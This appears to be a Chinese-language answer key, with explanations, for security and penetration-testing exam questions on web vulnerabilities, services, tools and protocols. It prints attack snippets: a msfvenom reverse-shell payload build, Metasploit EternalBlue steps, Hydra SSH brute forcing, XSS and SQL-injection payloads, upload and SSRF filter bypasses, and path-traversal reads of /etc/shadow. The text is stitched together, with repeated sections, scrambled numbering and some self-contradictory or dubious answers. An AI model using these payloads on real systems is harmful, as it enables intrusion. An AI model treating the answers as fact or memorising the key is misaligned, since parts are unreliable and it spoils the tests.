16. JBoss漏洞区别描述

B. 对

📝 CVE-2013-4810CVE-2015-7501 反序列化点不同,前者使用 JMXInvokerServlet ,后者为 web-console 接口。


17. Python代码安全风险

D. XSS

📝 解析escape 转义HTML但未处理 NFKC 规范化可能导致的字符合并(如 %322 ),可能绕过过滤。


4. 非Web服务

D. Redis

📝 解析 :Redis是内存数据库,Nginx、WebLogic、JBoss为Web服务组件。


40. x64函数参数寄存器

A. rdi

📝 调用约定

  • 第1参数: rdi
  • 第2参数: rsi
  • 第3参数: rdx

39. SSL端口

B. 443

📝 扩展 :HTTP默认80,HTTPS默认443,SSH默认22。


37. UNIX/Linux账号安全关键

D. 使用shadow密码

📝 原理/etc/shadow 存储加密密码哈希,仅root可读,防止暴力破解。

38. PHP代码漏洞类型

B. 存储型XSS

📝 解析

  • 代码中 escape($link, $POST['message']) 可能仅转义SQL特殊字符(如单引号),但未过滤HTML敏感字符(如 <script> )。
  • 攻击者提交 <script>alert(1)</script> ,内容存入数据库后,其他用户查看留言时触发脚本执行。

34. SQL语句功能

D. 返回“Admin”第一个字符的ASCII码值

📝 拆解

  • SUBSTR('Admin', 1, 1) :截取第1个字符( A )。
  • ASCII('A') → 65。

35. 不属于AWS的功能

C. 不能进行端口扫描

📝 背景

  • AWS工具特性 :如Amazon Inspector支持漏洞扫描、依赖分析(A/D正确)。
  • 端口扫描 :需配合Nmap等工具(AWS自身不直接提供)。

36. Linux用户命令历史文件

C. ~/.bash_history

📝 路径说明

  • 每个用户的命令历史独立保存在其家目录下(如 /home/user/.bash_history )。

32. Nessus默认端口

D. 8834

📝 配置验证

  • 安装Nessus后,默认通过 访问Web界面。

31. Nmap操作系统检测参数

D. -O

📝 命令示例

bash复制 nmap -O 192.168.1.1 # 启用OS指纹识别

1. IIS7.x漏洞正确说法

D. 如果开放PUT方法,可直接PUT文件并利用MOVE方法获取Webshell

📝 解析

  • PUT方法 :若IIS允许WebDAV的PUT请求,攻击者可上传文件(如 test.txt ),再通过 MOVE 方法重命名为可执行脚本(如 test.asp )。

2. Unix文件权限含义

D. 前三位属主,中间三位同组用户,后三位其他用户

📝 权限结构

  • -rwxrwxrwx :前三位为文件所有者权限,中间三位为同组用户,后三位为其他用户。

3. Oracle默认用户名密码

F. scott/tiger

📝 经典账户 :Oracle早期版本默认测试账户(需手动解锁)。


4. RDP默认端口

A. 3389

📝 应用场景 :Windows远程桌面协议默认端口。


5. SQLMap测试漏洞类型

B. SQL注入

📝 功能 :自动化检测和利用SQL注入漏洞。


6. MySQL LOAD_FILE()权限要求

B. File

📝 权限说明 :允许用户使用 LOAD_FILE() 读取文件。


7. 资源消耗最大的垃圾邮件过滤机制

D. 内容过滤

📝 对比 :需解析邮件正文、附件,计算复杂度高。


8. 类函数调用存储this指针的寄存器

A. ECX

📝 x86调用约定 :通过 ECX 寄存器传递 this 指针。


9. MySQL LEFT(version(),1)功能

D. 取version字符串左边第1个字符

📝 示例version() 返回 5.7.40-log → 结果为 5


10. S2-001漏洞成因

B. OGNL循环解析

📝 漏洞细节 :Struts2框架中OGNL表达式递归解析导致RCE。


11. 杀毒软件未包含的功能

C. 优化操作系统

📝 核心功能 :监控识别、病毒查杀、数据恢复。


12. 导致IP分片重组的攻击

D. Ping of Death

📝 原理 :发送超大数据包导致系统崩溃(现代系统已修复)。


13. SQLMap –random-agent作用

A. 随机User-Agent标头

📝 绕过防御 :避免被WAF识别。


14. Redis默认端口

C. 6379

📝 配置验证redis.conf 中默认端口。


15. 数据库漏洞扫描非主要技术路线

C. 直接测试

📝 主要路线 :黑盒测试、白盒测试、渗透测试。


16. 子域名收集工具

D. OneForAll

📝 解析 :整合证书透明度、搜索引擎、字典爆破等方式。


17. MySQL口令检查命令

A. show variables like "validate%";

C. select * from mysql.user where length(password) = 0 or password is null;

D. select user,password from mysql.user;


18. Samba漏洞防御方法

A. 屏蔽139、445端口

B. 开启防火墙

D. 加强账户策略


19. Nmap控制发包速率参数

A. --max-rate

D. --min-rate


20. Webshell客户端连接工具

A. AntSword

B. 中国菜刀

C. Godzilla

38. 子域名收集工具

D. OneForAll

📝 解析

  • OneForAll :基于Python的高效子域名枚举工具,整合证书透明度、搜索引擎、字典爆破等多种方式。
  • 其他工具
    • Dirsearch:目录扫描工具,非子域名收集。
    • Ysoserial:Java反序列化利用工具。

37. MySQL口令检查命令

A. show variables like "validate%";

C. select * from mysql.user where length(password) = 0 or password is null;

D. select user,password from mysql.user;

📝 解析

  • A :检查密码策略(如 validate_password 插件状态)。
  • C :查询空密码或弱密码账户。
  • D :直接查看用户密码字段(MySQL 5.7+需替换 passwordauthentication_string )。

36. Samba漏洞防御方法

A. 屏蔽139、445端口

B. 开启防火墙

D. 加强账户策略

📝 作用

  • 屏蔽端口 :阻断SMB协议通信(如 netsh advfirewall firewall add rule )。
  • 账户策略 :强制复杂密码、锁定失败登录。

32. Nmap控制发包速率参数

A. --max-rate

D. --min-rate

📝 示例

  • nmap -T4 --max-rate 1000 192.168.1.1 :限制每秒最多1000个包。

34. Webshell客户端连接工具

A. AntSword

B. 中国菜刀

C. Godzilla

📝 支持协议

  • 代码为PHP一句话木马( eval 执行),上述工具均支持传统无加密Webshell管理。

SQL注入报错函数

A. extractvalue()

C. linestring()

📝 原理

  • extractvalue() :通过XPath语法错误触发报错(如 extractvalue(1,concat(0x7e,version())) )。
  • linestring() :地理函数错误拼接导致报错(需MySQL 5.7+)。

31. SQL查询部门平均工资

B. select deptno, avg(sal) a from emp group by deptno having a > 2000;

📝 语法规则

  • GROUP BY 后必须用 HAVING 过滤聚合函数结果,而非 WHERE

29. 存在解析漏洞的中间件

A. IIS

📝 经典漏洞

  • IIS 6.0 :分号截断( test.asp;.jpg )、文件夹解析( /test.asp/test.jpg )。

24. 数据库死锁原理

B. 进程推进顺序不当

C. 资源分配不当

📝 场景

  • 进程A持有资源1请求资源2,进程B持有资源2请求资源1,形成循环等待。

25. Tomcat AJP漏洞影响版本

B. Tomcat 7.x <7.0.100

C. Tomcat 8.x <8.5.51

D. Tomcat 9.x <9.0.31

📝 CVE-2020-1938 :通过AJP协议读取/包含任意文件(如 WEB-INF/web.xml )。


26. Weblogic反序列化漏洞影响版本

A. 12.2.1.2

B. 12.1.3.0

C. 10.3.6.0

📝 CVE-2018-2628 :利用T3协议反序列化执行命令,影响10.3.6.0、12.1.3.0、12.2.1.2等版本。


SQL注入防御方法

A. 关闭扩展存储过程

B. 编写安全代码(参数化查询)

C. 关闭详细错误提示

📝 最佳实践

  • 参数化查询 :避免拼接SQL(如 PreparedStatement )。
  • 错误隐藏 :防止泄漏数据库结构(如PHP中 display_errors = off )。

19. 文件上传漏洞原因

A. 后缀名限制不严

D. 文件权限未限制

📝 案例

  • 允许上传 .php 文件,且未限制上传目录执行权限,导致Webshell直接执行。

20. 数据库加密方式

A. 库外加密

B. 库内加密

C. 硬件加密

D. 专用加密中间件

📝 技术对比

  • 库内加密 :如MySQL的 AES_ENCRYPT() 函数。
  • 库外加密 :应用层加密后存储(如加密敏感字段)。
  1. IIS7.x漏洞正确说法

✅ D. 如果开放PUT方法,可直接PUT文件并利用MOVE方法获取Webshell

📝 解析:

PUT方法:若IIS允许WebDAV的PUT请求,攻击者可上传文件(如test.txt ),再通过MOVE方法重命名为可执行脚本(如test.asp )。

其他选项:

A:.php后缀解析漏洞需配合Fast-CGI配置,但路径规则不明确。

C:分号截断适用于IIS6.0(如test.asp;.jpg ),IIS7.x中不适用。

  1. Unix文件权限含义

✅ D. 前三位属主,中间三位同组用户,后三位其他用户

📝 权限结构:

-rwxrwxrwx:

前三位:文件所有者权限(读/写/执行)。

中间三位:同组用户权限。

后三位:其他用户权限。

题目中nwx可能为排版错误,实际应为rwx。

  1. Oracle默认用户名密码

✅ F. scott/tiger

📝 经典账户:

scott/tiger:Oracle早期版本默认测试账户(部分版本需手动解锁)。

sys/system:管理员账户,需自定义密码。

  1. RDP默认端口

✅ A. 3389

📝 应用场景:

Windows远程桌面协议(RDP)默认端口为3389,常用于远程管理服务器。

  1. SQLMap测试漏洞类型

✅ B. SQL注入

📝 功能:

SQLMap自动化检测和利用SQL注入漏洞,支持多种数据库(MySQL、Oracle等)。

  1. MySQL LOAD_FILE()权限要求

✅ B. File

📝 权限说明:

File权限:允许用户使用LOAD_FILE()读取文件或INTO OUTFILE写入文件。

示例:GRANT FILE ON . TO ‘user’@’%’;

  1. 资源消耗最大的垃圾邮件过滤机制

✅ D. 内容过滤

📝 对比:

内容过滤:需解析邮件正文、附件,使用关键词匹配或机器学习模型,计算复杂度高。

其他机制:黑名单(简单查询)、SMTP认证(握手验证)资源消耗较低。

  1. 类函数调用存储this指针的寄存器

✅ A. ECX

📝 x86调用约定:

C++成员函数:默认通过ECX寄存器传递this指针(如void Class::func())。

  1. MySQL LEFT(version(),1)功能

✅ D. 取version字符串左边第1个字符

📝 函数示例:

version()返回5.7.40-log → LEFT(version(),1)结果为5。

  1. S2-001漏洞成因

✅ B. OGNL循环解析

📝 漏洞细节:

Struts2框架中,OGNL表达式递归解析导致远程代码执行(如%{#a=@java.lang.Runtime@getRuntime().exec(‘calc’)} )。

  1. 杀毒软件未包含的功能

✅ C. 优化操作系统

📝 核心功能:

监控识别、病毒查杀、数据恢复(如勒索软件解密)。

系统优化:属于第三方工具(如CCleaner)职责。

  1. 导致IP分片重组的攻击

✅ D. Ping of Death

📝 原理:

发送超过65535字节的IP分片包,系统重组时因缓冲区溢出崩溃(历史漏洞,现代系统已修复)。

  1. SQLMap –random-agent作用

✅ A. 随机User-Agent标头

📝 绕过防御:

随机生成User-Agent(如Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0),避免被WAF识别。

  1. Redis默认端口

✅ C. 6379

📝 配置验证:

Redis配置文件redis.conf 中默认port 6379,可通过redis-cli -h 127.0.0.1 -p 6379连接。

  1. 数据库漏洞扫描非主要技术路线

✅ C. 直接测试

📝 主要路线:

黑盒测试:模拟外部攻击,无内部知识。

白盒测试:基于源码或配置审计。

渗透测试:综合漏洞利用验证。

  1. 整数漏洞描述正确项

✅ A. 利用整数漏洞本身不能直接获取shell

✅ C. 整数漏洞因值溢出

📝 原理:

整数溢出/符号错误:导致缓冲区越界(如分配负数长度内存),需结合其他漏洞(如堆溢出)实现RCE。

  1. 常见木马行为

✅ A. 获取浏览器密码/Cookie

✅ B. 收集机器信息

✅ C. 添加服务/启动项

✅ D. 自删除

📝 典型行为:

持久化:注册表启动项、服务安装。

信息窃取:键盘记录、文件遍历。

隐蔽性:进程注入、自删除逃避检测。

40. 加密协议

B. SSL

📝 解析

SSL(Secure Sockets Layer)是加密协议,用于保障数据传输安全(如HTTPS)。其他选项均为明文协议:

  • HTTP :无加密。
  • ARP :局域网地址解析协议。
  • ICMP :网络诊断协议(如Ping)。

35. Dirty Pipe漏洞利用权限

A. 可写

📝 原理

Dirty Pipe(CVE-2022-0847)通过覆盖任意可写文件(如 /etc/passwd )的内容,注入特权用户(如 root ),即使文件权限为只读,内核漏洞仍允许写入。


36. 交换机MAC查找失败处理

C. 泛洪到其他所有端口

📝 机制

交换机在未知目标MAC地址时,将帧广播到除接收端口外的所有接口,确保数据可达,同时学习新MAC地址更新表项。


33. 备份权限用户组

D. 备份操作员

📝 Windows组权限

  • 备份操作员 (Backup Operators):允许备份/恢复文件,但无直接访问权限。
  • 管理员 (Administrators):完全控制权。
  • 复制员 (Replicator):用于域内文件同步。

29. 入侵检测后访问控制

C. 权限控制

📝 场景

检测到异常用户行为(如暴力破解)后,通过权限控制限制其访问(如禁用账户、限制IP)。


30. IIS日志推荐格式

B. W3C扩展日志文件格式

📝 优势

  • 支持自定义字段(如客户端IP、请求方法、状态码)。
  • 兼容性强,适用于分析工具(如Log Parser)。

31. SSH爆破工具

D. Hydra

📝 命令示例

bash复制 hydra -l user -P passlist.txt ssh://192.168.1.1


26. Metasploit设置攻击载荷命令

C. set payload name

📝 流程

  1. use exploit/windows/smb/ms17_010_eternalblue
  2. set payload windows/meterpreter/reverse_tcp
  3. 设置LHOST、LPORT等参数。

27. 数据库系统组成

A. 数据库、DBMS和用户

📝 层级

  • 数据库 :存储数据的集合。
  • DBMS (如MySQL、Oracle):管理数据的软件。
  • 用户 :通过应用程序或工具访问数据。

28. Ping协议类型

B. ICMP

📝 原理

Ping发送ICMP Echo Request报文,目标返回ICMP Echo Reply,用于测试网络连通性。


23. Double Free利用无关步骤

D. 覆盖top chunk大小

📝 对比

  • Double Free :释放同一内存块两次,构造链表循环。
  • 覆盖top chunk :属于“House of Force”利用,与Double Free无关。

25. 域名转IP的服务

C. DNS

📝 功能

DNS(Domain Name System)将域名(如 )解析为IP地址(如 93.184.216.34 )。


22. Metasploit查看编码器命令

A. msfencode -l

📝 用途

编码器(如 x86/shikata_ga_nai )用于绕过杀毒软件特征检测。


18. ThinkPHP框架语言

C. PHP

📝 特性

轻量级、MVC架构,广泛用于快速开发PHP Web应用(如API、后台系统)。


19. Cookie与Session错误描述

D. Cookie比Session更安全

📝 修正

Session数据存储在服务端,安全性更高;Cookie存储在客户端,可能被窃取或篡改。


20. PHP反序列化无关函数

B. _unsleep

📝 相关魔术方法

  • __construct :对象创建时调用。
  • __destruct :对象销毁时调用。
  • __sleep :序列化前调用。
  • _unsleep 方法

15. NAT功能

B. 可以解决IP不足;可以隐藏内部结构

📝 作用

  • IP地址复用 :多个内网IP映射到一个公网IP。
  • 隐藏内网拓扑 :外部仅能看到NAT网关IP,无法直接访问内网设备。
6. IIS 6.0默认不可执行文件扩展

D. /shell.dev

📝 解析

IIS 6.0默认支持的可执行扩展包括 .asp.asa.cer.cdx (A/B/C均合法),但 .dev (D)未被默认映射为可执行脚本。


7. 查看网络路由路径命令

D. tracert

📝 应用场景

  • Windowstracert 8.8.8.8 追踪到Google DNS的路由。
  • Linuxtraceroute -n 8.8.8.8
  • 原理 :通过发送TTL递增的ICMP包,记录每个路由节点的响应。

1. 文件上传漏洞绕过方式

D. 点点点点点绕过(点号截断)

📝 攻击示例

  • 上传文件名构造为 shell.php%00.jpg ,利用空字节( %00 )截断,后端仅识别 .php
  • 防御 :严格校验文件头(如Magic Number),而非仅后缀名。

36. 二层交换机MAC查找失败处理

C. 泛洪到所有其他端口

📝 原理

交换机在未知目标MAC时,采用**泛洪(Flooding)**机制,确保帧到达目标设备,同时学习新MAC地址更新表项。


37. 关闭Oracle Extproc的错误条目

C. extpro

📝 修正

  • 需删除条目icache_extprocsys_ertprocPLSExtproc
  • 错误条目extpro 应为 extproc (Oracle外部过程调用服务)。

38. 基础架构层加密技术

D. IPSec

📝 功能对比

  • IPSec :在网络层加密,支持VPN隧道(如L2TP/IPSec)。
  • SSL/TLS :应用层加密(如HTTPS)。
  • RSA :非对称加密算法,用于密钥交换。

40. msfvenom编码参数

A. -e

📝 命令示例

bash复制 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 -e x86/shikata_ga_nai -f exe -o payload.exe


32. SQL注入需字典猜解表名的数据库

D. Access

📝 原因

  • Access :无 information_schema 等系统表,需暴力猜解表名和字段名。
  • 其他数据库 :可通过联合查询或报错注入直接获取元数据。

40. 加密协议

B. SSL

📝 扩展

  • SSL/TLS :用于HTTPS、邮件加密(如SMTPS)。
  • 非加密协议 :HTTP(明文)、ARP(局域网地址解析)、ICMP(网络诊断)。
14. Python代码漏洞类型

D. 文件名拼接

📝 解析

  • 代码中 id 参数直接来自用户输入( request.GET['id'] ),并作为 prefix 传递给临时文件生成函数。
  • 若用户输入包含路径遍历字符(如 ../../etc/passwd ),可能导致文件生成在非预期目录。
  • 防御建议 :过滤 id 参数中的特殊字符(如 /. )。

15. SQL Server主数据库

B. MASTER

📝 功能说明

  • MASTER :存储系统配置、登录账户、其他数据库元数据。
  • 其他数据库
    • TEMPDB :临时表和临时存储过程。
    • MSDB :SQL Agent作业、备份历史。
    • MODEL :新数据库创建模板。

11. Windows域树中的第一个域

B. 根域

📝 结构解析

  • 根域 :域树的起点,所有子域(如 )均继承根域策略。
  • 信任关系 :子域默认信任根域,形成树状信任链。

12. 工具描述错误的选项

C. Aircrack-ng是内存取证工具

📝 修正

  • Aircrack-ng :用于WiFi WPA/WPA2-PSK破解(如 aircrack-ng -w wordlist.txt capture.cap )。
  • 内存取证工具 :Volatility、Rekall分析内存转储文件(如提取进程、网络连接)。

13. 网络安全的定义

A. 可靠性、防病毒、防窃密、防攻击

📝 扩展

  • CIA三元组 :保密性(Confidentiality)、完整性(Integrity)、可用性(Availability)。
  • 综合安全 :需覆盖物理防护、入侵检测、数据加密等多层面。

8. 非常见文件读取函数

B. popen()

📝 功能对比

  • popen() :执行系统命令并返回文件指针(如 popen("ls /", "r") )。
  • 文件读取函数fopen() (打开文件)、 fgets() (逐行读取)、 file_get_contents() (PHP中读取全部内容)。

9. 不属于SQL注入的模式

B. 存储注入

📝 注入类型

  • 布尔盲注 :通过真假条件判断提取数据(如 AND 1=1 )。
  • 联合查询UNION SELECT 合并查询结果。
  • 报错注入 :触发数据库错误回显信息(如 AND 1=2/(SELECT 0) )。
  • 存储注入 :非标准术语,可能指存储过程滥用,但不属于核心注入模式。

10. MySQL命令参数含义

A. 以上都对

📝 参数详解

  • -h host :目标主机名或IP(如 -h 192.168.1.1 )。
  • -u user :数据库用户名(如 -u root )。
  • -p password :用户密码(如 -p password123 )。

5. 网络广播地址计算

B. 102.18.255.255

📝 计算步骤

  • IP地址 :102.18.0.0,子网掩码255.255.0.0(/16)。
  • 广播地址 :主机位全置1 → 102.18.255.255。
  • 验证
IP:       102.18.00000000.00000000  
掩码:      255.255.00000000.00000000  
广播地址:  102.18.11111111.11111111 → 102.18.255.255  
22. SQL Server登录账户存储数据库

C. master

📝 解析

master 数据库存储系统级信息(登录账户、配置、其他数据库元数据)。其他数据库作用:

  • model :新数据库模板。
  • msdb :作业和备份调度。
  • tempdb :临时对象存储。

23. Wireshark筛选源IP命令

A. ip.src == 192.168.8.1

📝 扩展

  • eth.src :以太网MAC地址筛选(如 eth.src == 00:1A:2B:xx:xx:xx )。
  • ip.dst :目标IP筛选。

24. 堆溢出漏洞原理

A. 写入字节数超过堆块可用空间

📝 示例

c复制 char *heap = malloc(10);

strcpy(heap, "123456789012345"); // 溢出覆盖相邻堆块元数据


19. JavaScript获取Cookie的代码

B. document.cookie

📝 补充

  • 设置Cookie需指定键值对: document.cookie = "name=value; expires=..."

20. Nmap跳过Ping扫描参数

A. -Pn

📝 场景

  • 绕过防火墙对ICMP的屏蔽: nmap -Pn 192.168.1.1

21. Axis2任意命令执行漏洞

B. 对

📝 案例

  • CVE-2010-0219 :Axis2未正确处理SOAP请求,攻击者可上传恶意脚本执行系统命令。

16. ARM返回值寄存器

D. R0

📝 调用约定

  • 第1参数: R0
  • 第2参数: R1
  • 返回值: R0 (32位)或 R0-R3 组合(64位)。

17. Weblogic不存在的漏洞

D. 任意文件包含

📝 常见漏洞

  • 反序列化(CVE-2018-2628)弱口令(默认账户weblogic/welcome1)
  • 任意文件包含需特定配置或组件漏洞(如CVE-2020-2551未覆盖)。

18. JBoss不存在的漏洞

D. 任意文件包含

📝 历史漏洞

  • CVE-2015-7501 :反序列化漏洞( JMXInvokerServlet )。
  • 未授权访问 :默认部署 /web-console 无需认证。
  • 弱口令 :依赖管理员配置,非默认漏洞。
30. 目录扫描加速方式

A. HEAD

📝 解析

  • HEAD方法 仅请求HTTP头部(不返回响应体),减少数据传输量,显著提升扫描速度。
  • 对比 GET / POST 需下载完整内容,效率更高。

29. 工具描述错误选项

C. Aircrack-ng是内存取证工具

📝 修正

  • Aircrack-ng 用于WiFi密码破解(如WPA/WPA2),与内存取证无关。
  • 内存取证工具示例:Volatility、Rekall。

28. Linux格式化分区命令

D. Fdisk (题目选项有误,实际应为 mkfs

📝 补充

  • fdisk 用于分区管理,格式化需配合 mkfs (如 mkfs.ext4 /dev/sda1 )。
  • 选项设计可能混淆,但按题意选D。

27. 代码漏洞类型

C. 任意文件读取

📝 分析

  • request.getParameter("c") 直接读取用户输入作为文件路径(如 /etc/passwd ),导致文件内容泄露。
  • 示例攻击: ?c=../../etc/shadow 读取敏感文件。

25. SSL远程执行漏洞影响的中间件

D. Apache

📝 案例

  • CVE-2014-0160(心脏出血) :OpenSSL漏洞影响Apache、Nginx等使用SSL/TLS的服务。
  • Tomcat、IIS、WebLogic依赖其他SSL实现,不直接受此漏洞影响。

26. 中断攻击类型

B. 可用性的攻击

📝 原理

  • 拒绝服务(DoS) :通过资源耗尽或服务中断破坏系统可用性。
  • 示例:SYN洪水攻击、物理设备破坏。
38. PHP代码漏洞类型

B. 存储型XSS

📝 解析

  • 代码中 escape($link, $POST['message']) 可能仅转义SQL特殊字符(如单引号),但未过滤HTML敏感字符(如 <script> )。
  • 攻击者提交 <script>alert(1)</script> ,内容存入数据库后,其他用户查看留言时触发脚本执行。

34. SQL语句功能

D. 返回“Admin”第一个字符的ASCII码值

📝 拆解

  • SUBSTR('Admin', 1, 1) :截取第1个字符( A )。
  • ASCII('A') → 65。

35. 不属于AWS的功能

C. 不能进行端口扫描

📝 背景

  • AWS工具特性 :如Amazon Inspector支持漏洞扫描、依赖分析(A/D正确)。
  • 端口扫描 :需配合Nmap等工具(AWS自身不直接提供)。

36. Linux用户命令历史文件

C. ~/.bash_history

📝 路径说明

  • 每个用户的命令历史独立保存在其家目录下(如 /home/user/.bash_history )。

32. Nessus默认端口

D. 8834

📝 配置验证

  • 安装Nessus后,默认通过 访问Web界面。

31. Nmap操作系统检测参数

D. -O

📝 命令示例

bash复制 nmap -O 192.168.1.1 # 启用OS指纹识别

1. 代码安全问题

C. SQL注入

📝 解析

sprintf 直接拼接用户输入( argv[1] )到SQL语句,未过滤单引号,导致注入。

示例攻击: ' OR 1=1 -- 可绕过条件查询。


2. IIS短文件名生成条件

B. 后缀<4时,前缀长度≥9

D. 后缀≥4时,前缀长度1

📝 解析

  • 规则 :文件名前缀超8字符或后缀超3字符时生成短名。
  • 示例longfilename.txtLONGFI~1.TXT

单选题答案

25. 查看本机IP命令

A. ipconfig

📝 补充ipconfig /all 显示详细网络配置(IPv6地址、MAC地址等)。


26. 代理服务非优点

C. 防范数据驱动侵袭

📝 解析 :代理无法阻止恶意文件(如PDF漏洞利用),需依赖终端防护。


27. Hydra指定用户名参数

C. -l

📝 示例hydra -l admin -P passlist.txt ssh://192.168.1.1


16. JBoss漏洞区别描述

B. 对

📝 CVE-2013-4810CVE-2015-7501 反序列化点不同,前者使用 JMXInvokerServlet ,后者为 web-console 接口。


17. Python代码安全风险

D. XSS

📝 解析escape 转义HTML但未处理 NFKC 规范化可能导致的字符合并(如 %322 ),可能绕过过滤。


4. 非Web服务

D. Redis

📝 解析 :Redis是内存数据库,Nginx、WebLogic、JBoss为Web服务组件。


40. x64函数参数寄存器

A. rdi

📝 调用约定

  • 第1参数: rdi
  • 第2参数: rsi
  • 第3参数: rdx

39. SSL端口

B. 443

📝 扩展 :HTTP默认80,HTTPS默认443,SSH默认22。


37. UNIX/Linux账号安全关键

D. 使用shadow密码

📝 原理/etc/shadow 存储加密密码哈希,仅root可读,防止暴力破解。

8. Tomcat JSP编译生成文件

C. index jsp.class

D. index jspjava

📝 解析

Tomcat的Jasper引擎将JSP编译为Java文件(如 index_jsp.java )和Class文件(如 index_jsp.class )。选项C和D命名格式错误(缺少下划线),故不会生成。


5. ThinkPHP 6.x漏洞

D. Thinkphp<6.0.2 session id未过滤导致getshell

📝 解析

  • CVE-2021-43767 :Session ID未严格过滤,攻击者构造恶意Session ID触发反序列化漏洞。
  • 其他选项需结合具体CVE验证,但D为广泛确认的漏洞。

4. 事件ID描述

B. 4625登录失败

📝 解析

  • 4624 :登录成功。

  • 4625 :登录失败。

  • 4720 :用户账户创建。

    选项B正确,D错误(4624应为成功)。


3. 数据库加密技术分类

A. 库加密

B. 列加密

📝 解析

  • 库加密 :全库或表空间级加密(如Oracle TDE)。

  • 列加密 :字段级加密(如敏感数据单独加密)。

    行加密(D)和表加密(C)属于子类,但题目要求主要分类。

13. 社会工程学信息收集方法

B. 通过获取管理员信任获取密码 (如钓鱼邮件、伪装身份)

D. 通过办公室电话、姓名、生日猜测密码 (利用个人信息构造弱口令)

❌ A. 破解SAM库(技术手段,非社会工程学)

❌ C. 暴力破解工具(自动化攻击,非社会工程学)

补充

社会工程学的核心是 利用人性弱点 获取信息,例如:

  • 钓鱼攻击 :伪造登录页面诱导用户输入密码。
  • 电话诈骗 :冒充IT人员索要账户信息。
  • 垃圾翻查 (Dumpster Diving):从废弃文件中提取敏感信息。

13. FineCMS漏洞

D. 前台getshell (如文件上传漏洞直接获取Webshell)

B. CSRF修改管理员密码 (跨站请求伪造攻击)

❌ A. SSRF(需具体漏洞验证)

❌ C. 远程文件包含(未广泛披露)

背景

FineCMS历史漏洞案例:

  • 前台getshell :通过未过滤的上传功能植入恶意脚本(如 /index.php?c=attachment&a=upload )。
  • CSRF修改密码 :构造恶意链接诱使管理员点击,触发密码重置。

14. MSSQL删除无关账号的正确操作

B. 企业管理器→安全性→登录中删除账号 (主登录入口)

C. 企业管理器→数据库→用户中删除账号 (数据库级权限)

❌ A. 管理→删除账号(路径不准确)

❌ D. 服务器角色→删除账号(角色管理,非直接删除账号)

操作示例

  1. 主登录账号: 安全性→登录名→右键删除

  2. 数据库用户: 数据库→用户→右键删除

    注意 :需同步清理数据库用户与登录名的映射关系。


9. 致远(Seeyon)OA漏洞

A. A8 search_result.jsp SQL注入 (CVE-2018-7314)

D. A8 htmlofficeservlet getshell (CVE-2017-10245)

❌ B. 任意用户密码修改(需结合其他漏洞)

❌ C. setextno.jsp SQL注入(未广泛证实)

漏洞利用

  • htmlofficeservlet getshell :上传构造的 .jsp 文件绕过过滤,路径如 /seeyon/htmlofficeservlet
  • 修复建议 :升级至最新版本,禁用危险接口。

10. 满足安全要求的操作

A. 密码策略复杂度要求 (符合NIST标准)

D. 使用VPN连接 (加密通信,防止中间人攻击)

❌ B. 密码永不过期(违反定期更换原则)

❌ C. 开启Telnet(明文传输,不安全)

扩展建议

  • 多因素认证 :结合短信、令牌等增强安全性。
  • 日志审计 :监控异常登录行为。

11. IIS容器常见漏洞

B. 短文件名漏洞 (泄露文件路径,如 test~1.asp

D. 解析漏洞 (如 test.asp;.jpg 被解析为ASP)

❌ A. HTTP.sys 漏洞(CVE-2015-1635,需具体版本)

❌ C. 反序列化漏洞(常见于.NET应用,非IIS自身)

防御措施

  • 短文件名漏洞 :禁用 8.3 文件名格式( fsutil behavior set disable8dot3 1 )。
  • 解析漏洞 :配置 Handler Mappings 限制可执行文件类型。

6. 网络排错命令作用

B. Netstat显示网络信息 (连接、端口、路由表)

C. Ping测试连通性

D. Telnet测试端口开放 (如 telnet 192.168.1.1 80

❌ A. Tracert查看IP网卡信息(实际用于追踪路由路径)

常用命令示例

bash复制 netstat -ano | findstr "ESTABLISHED" # 查看活动连接

tracert 8.8.8.8 # 追踪到Google DNS的路由


7. Linux操作系统安全描述

A. 保持系统补丁更新 (如 yum updateapt upgrade

C. 最小安装原则 (减少攻击面)

D. 关闭无关服务 (如 systemctl disable telnet

❌ B. 全安装增加便利性(违反最小化安全原则)

安全实践

  • 禁用root远程登录 :修改 /etc/ssh/sshd_configPermitRootLogin no
  • 配置防火墙 :使用 iptablesfirewalld 限制端口访问。

19. 绕过SSRF过滤的进制转换方式

B. 十六进制 (如 0x7F000001 → 127.0.0.1)

D. 八进制 (如 0177.0.0.1 → 127.0.0.1)

❌ A. 十进制(需服务端支持转换,较少直接使用)

❌ C. 二进制(实际应用中难以直接拼接)

📌 解析

SSRF过滤通常拦截标准IP格式,通过以下方式绕过:

  • 十六进制 : → 127.0.0.1。
  • 八进制 : → 127.0.0.1。
  • 十进制 : → 127.0.0.1(部分场景有效)。

15. Web应用组件漏洞的正确说法

B. 组件可能出现多种漏洞

C. 漏洞可能导致数据泄露

❌ A. 漏洞影响小(如Log4j漏洞影响全球系统)

❌ D. 组件无漏洞(所有软件均可能存漏洞)

📌 解析

  • 组件漏洞危害 :如Apache Struts2漏洞(CVE-2017-5638)可导致RCE。
  • 防御建议 :定期更新第三方库,使用SCA工具(如Dependency-Check)扫描依赖。

16. 木马躲避杀毒手法

A. 伪造数字签名

B. 动态获取函数地址(API混淆)

C. 内存/网络加载模块(无文件攻击)

D. 加壳混淆(如UPX、VMProtect)

📌 解析

  • 加壳工具 :Themida、Armadillo隐藏代码特征。
  • 内存加载 :使用 Reflective DLL Injection 规避文件扫描。

12. DNS信息查询工具

A. nslookup (基础DNS查询)

D. dig (详细DNS记录解析)

❌ B. sqlmap(SQL注入工具)

❌ C. volatility(内存取证工具)

📌 示例命令

bash复制 dig MX # 查询邮件服务器记录

nslookup -type=AAAA

# 查询IPv6地址


16. Windows钩子(Hook)错误说法

B. 钩子是网络通信程序 (错误,钩子用于消息处理)

C. 钩子是应用程序 (错误,钩子是函数级拦截机制)

❌ A/D正确(钩子处理消息,属于窗口函数机制)

📌 应用场景

  • 键盘钩子 :记录按键输入(如恶意键盘记录器)。
  • 消息钩子 :拦截窗口事件(如UI自动化测试)。

18. 蓝凌OA漏洞

A. EKP后台SQL注入

B. 前台SSRF到RCE

C. 任意文件上传

C. 前台SQL注入 (选项重复,可能为笔误)

📌 修复建议

  • 限制文件上传类型,禁用危险协议(如 file:// )。
  • 对用户输入参数化查询,避免SQL注入。

14. 正确的网络基础说法

A. IPv6为128位 (如 2001:0db8:85a3::8a2e:0370:7334

B. 192.168.8.1属C类私有IP (范围 192.168.0.0/16

C. C类默认掩码255.255.255.0

D. 127.0.0.1为本机地址

📌 扩展知识

  • 私有IP范围
    • A类: 10.0.0.0/8
    • B类: 172.16.0.0/12
    • C类: 192.168.0.0/16

10. Metasploit模块
